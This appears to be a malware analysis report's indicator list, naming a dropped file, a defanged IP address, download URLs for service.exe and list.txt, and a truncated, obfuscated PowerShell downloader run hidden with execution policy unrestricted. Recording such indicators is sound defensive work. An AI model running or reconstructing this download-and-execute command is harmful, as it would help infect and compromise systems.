Technical Information
- %APPDATA%\list.txt
- '16#.#0.147.233':80
- http://16#.#0.147.233/service.exe
- http://16#.#0.147.233/list.txt
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function WXfNsBGzPnB($AhpOaH, $spwntGZRCSJTVtd){[IO.File]::WriteAllBytes($AhpOaH, $spwntGZRCSJTVtd)};function BYPUlnSohX($AhpOaH){if($AhpOaH.EndsWith((lDQOSJXSdsdP...' (with hidden window)
- '%WINDIR%\syswow64\notepad.exe' %APPDATA%\list.txt